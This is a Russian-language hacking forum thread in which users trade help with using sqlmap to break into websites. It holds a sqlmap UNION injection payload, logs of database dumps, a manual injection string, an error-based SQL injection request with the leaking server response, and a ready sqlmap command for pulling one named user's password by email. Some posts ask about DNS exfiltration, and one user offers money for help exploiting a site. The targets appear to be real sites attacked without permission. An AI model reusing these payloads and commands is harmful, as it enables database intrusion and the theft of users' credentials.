Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. PoliGroS

    PoliGroS Member

    Joined:
    29 Mar 2012
    Messages:
    79
    Likes Received:
    8
    Reputations:
    0
    Вот, тут тупо копирует и тухнет, если поставить -v 4 тогда тупо все время копируется POST и вся инфа которая лежит в 3.txt. + [17:04:32] [TRAFFIC OUT] HTTP request [#]: итд Сайт конечно же работает, врятли sql запросы могут повесить бд или сам сайт.
     
  2. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    вообще там должен быть код ответа сервера и заголовки, хотя может это при -v 5, не помню точно
    "врятли sql запросы могут повесить бд или сам сайт" вот не стоит так заблуждаться)))
     
    _________________________
  3. She1ter

    She1ter New Member

    Joined:
    11 Dec 2016
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Друзья, подскажите плиз, не пойму как использовать Payload из sqlmap для создания sql запросов непосредственно в браузере?
    получил я такой вывод в sqlmap:
    Payload: id=-3918') UNION ALL SELECT 65,CONCAT(0x71716b7871,0x6248786b594f4d766a4545694f4b61685547556765656e697254686d7a49424c716c54736a6f6970,0x717a627a71)#
    Инъекция обнаружена, с помощью sqlmap вижу базу, таблицы и колонки (но не все).

    Как использовать payload, чтобы увидеть в браузере, что сайт http://test.ru:443/post.php?id=1 подвержен Sql injection?
    Пробовал подставлять вместо id=1 значение id=-3918'), ничего не получается, не могу понять принцип, может и правильно делаю но мой запрос WAF блокирует?
    В итоге сайт возвращает меня на главную страницу http://test.ru:443
     
  4. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    Code:
    [12:47:03] [INFO] resumed: 1
    [12:47:03] [INFO] retrieving the length of query output
    [12:47:03] [INFO] retrieved: 1
    [12:47:08] [INFO] retrieved: 1
    [12:47:15] [INFO] retrieving the length of query output
    [12:47:15] [INFO] retrieved: 16
    [12:47:25] [INFO] retrieved: ________________
    [12:47:25] [WARNING] unexpected HTTP code '406' detected. Will use (extra) valid
    ation step in similar cases
    [12:47:30] [INFO] retrieved: ????????????????
    [12:47:30] [INFO] retrieving the length of query output
    [12:47:30] [INFO] retrieved: 2
    [12:47:38] [INFO] retrieved: ??
    [12:47:38] [INFO] retrieving the length of query output
    [12:47:38] [INFO] retrieved: 128
    [12:48:27] [INFO] retrieved: ???????????????????????????????????????????????????
    ?????????????????????????????????????????????????????????????????????????????
    
    начинаю дамп вроде все норм потом ошибка [WARNING] unexpected HTTP code '406' detected. Will use (extra) valid
    ation step in similar cases
    и пошли вопросы(в чем может быть проблема?
     
  5. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    К коментарии для кого ?
    А вы пробовали в бурпе, вывод может быть и в ошибке, например 500. Надо через бурпсмотреть, почему редирект, скорее всего синтекс хромает, или условие не верное. Причин +100400
    п.с во всех бедах винить waf , разумно очень. :D

    brown, на скрине не увидел ничего нормального, 406 - Waf
     
  6. She1ter

    She1ter New Member

    Joined:
    11 Dec 2016
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Burp не пробовал, но разобрался, действительно синтаксис:-(
    Id=-1') -- -

    Спасибо
     
  7. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    а как обойти?есть темперы под это?
     
  8. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Подскажите как сдеать дамп в sql файл?
    А то csv немножко не то
    Может можно как то сделать дамп всей БД в sql файл и импортировать в последствии в phpMyAdmin
     
  9. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    как в sql не знаю но может поможет,--dump-format=HTML
    А вообще cvs в xls и xls импортируешь в sql
     
  10. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Это понятно, но проблема в том что с csv при дампе не пишется тип колонок int,varchar и т.д.
     
  11. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    посмотри какие колонки в логе
     
  12. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Да это все ясно, но ситуация в том что больше 100 таблиц и в каждой бывает до 40-50 колонок
    а в ручную зае.... собирать
    Потому и думал что может есть решение куда проще
     
  13. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    Code:
    12:22:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [12:22:43] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    [12:22:47] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
    [12:22:50] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
    [12:22:53] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
    [12:22:59] [INFO] target URL appears to be UNION injectable with 29 columns
    [12:25:10] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
    [12:25:10] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
    [12:25:13] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
    [12:25:16] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
    [12:25:20] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
    [12:25:23] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
    [12:25:26] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
    [12:25:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
    [12:25:33] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
    [12:25:36] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
    [12:25:39] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
    [12:27:52] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
    [12:27:55] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
    [12:27:58] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
    [12:28:01] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
    [12:28:06] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
    [12:28:09] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
    [12:28:13] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
    [12:28:13] [INFO] checking if the injection point on (custom) POST parameter '#1*' is a false positive
    
    Подскажите как прокрутить нормльно,он вроде подсчитал количество
    [12:22:59] [INFO] target URL appears to be UNION injectable with 29 columns
    но потом обломился
    И не хочет выдавать информационную схему
    Code:
    [12:28:48] [INFO] the back-end DBMS is MySQL
    web application technology: Apache
    back-end DBMS: MySQL < 5.0.0
    [12:29:42] [ERROR] unable to retrieve the number of databases
    [12:29:42] [INFO] falling back to current database
    [12:29:42] [INFO] fetching current database
    [12:29:42] [INFO] retrieving the length of query output
    

    [12:53:56] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database

    [13:55:10] [ERROR] information_schema not available, back-end DBMS is MySQL < 5.0
     
    #333 brown, 23 Dec 2016
    Last edited: 23 Dec 2016
  14. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    [12:28:13] [INFO] checking if the injection point on (custom) POST parameter '#1*' is a false positive
    Ложно позитивная жи.
     
  15. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    А как раскрутить?Готов заплатить
     
  16. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Вручную пробовать, может там вообще нету дыры.


    У меня вопрос, если я знаю email конкретного пользователя и мне надо выташить из базы его пароль. Как это сделать? id и прочее не знаю. Тип иньекции boolean-based blind. Можно ли как-то настроить sqlmap чтобы искала конкретный mail и вытаскивала пароль от нее? Т.к база очень большая, полный дамп может затянутся на недели.
     
  17. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    дыра есть, ОР болеан таблицы подберает
     
  18. Shubka75

    Shubka75 Elder - Старейшина

    Joined:
    24 Sep 2015
    Messages:
    94
    Likes Received:
    57
    Reputations:
    30
    -C pass --where="email='[email protected]'" --dump
     
    kacergei and karkajoi like this.
  19. axelmill

    axelmill New Member

    Joined:
    17 Nov 2016
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Пытаюсь заюзать уязвимость через sqlmap time based методом, но процесс очень медленно протекает. В общем нужно попробовать через DNS exfiltration.
    Подскажите, пожалуйста, если кто настраивал как поднять днс и настроить, чтобы можно было использовать --dns-domain
     
  20. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    Code:
    -------Boundary_NTHBPFPLPE
    Content-Disposition: form-data; name="email"
    
    [email protected]
    -------Boundary_NTHBPFPLPE
    Content-Disposition: form-data; name="password"
    
    'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(110),CHAR(81),CHAR(55),CHAR(112),CHAR(102),CHAR(109),CHAR(111),CHAR(112)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
    -------Boundary_NTHBPFPLPE--
    
    Response
    HTTP/1.1 500 Duplicate entry '4CunQ7pfmop1' for key 'group_key' SQL=SELECT * FROM #__mijoshop_customer WHERE LOWER(email) = '[email protected]' AND (password = SHA1(CONCAT(salt, SHA1(CONCAT(salt, SHA1('\'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(110),CHAR(81),CHAR(55),CHAR(112),CHAR(102),CHAR(109),CHAR(111),CHAR(112)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\''))))) OR password = '55a651117e240d7021e2bc35bb379d7e' OR password = ''and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(110),CHAR(81),CHAR(55),CHAR(112),CHAR(102),CHAR(109),CHAR(111),CHAR(112)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'' OR password = ''and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(110),CHAR(81),CHAR(55),CHAR(112),CHAR(102),CHAR(109),CHAR(111),CHAR(112)) from information_schemaCache-Control: no-cache
    Server: nginx
    Date: Fri, 30 Dec 2016 12:49:40 GMT
    Content-Type: text/html
    
    Почему мап не цепляет?